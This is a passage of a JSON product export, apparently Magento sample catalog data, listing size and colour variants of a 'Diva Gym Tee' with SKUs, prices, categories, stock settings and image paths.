enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1484\":{\"sku\":\"WS11-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-M-Green\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1485\":{\"sku\":\"WS11-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-M-Orange\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1486\":{\"sku\":\"WS11-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-M-Yellow\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1487\":{\"sku\":\"WS11-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-L-Green\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1488\":{\"sku\":\"WS11-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-L-Orange\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1489\":{\"sku\":\"WS11-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-L-Yellow\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"image\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws11-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1490\":{\"sku\":\"WS11-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-XL-Green\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1491\":{\"sku\":\"WS11-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-XL-Orange\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"diva-gym-tee-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1492\":{\"sku\":\"WS11-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Promotions\\/Women Sale,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Diva Gym Tee-XL-Yellow\",\"description\":\"<p>The Diva Gym Tee feels like your favorite right out of the mailbox. Micro-sleeved, lightweight and extra comfortable, it\'s a casual staple that hides incredible comfort behind a laid-back, carefree look.<\\/p>\\n<p>&bull; Bright yellow v-neck tee.<br \\/>&bull; Moisture-wicking fabric. <br \\/>&bull; Long-Sleeves. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 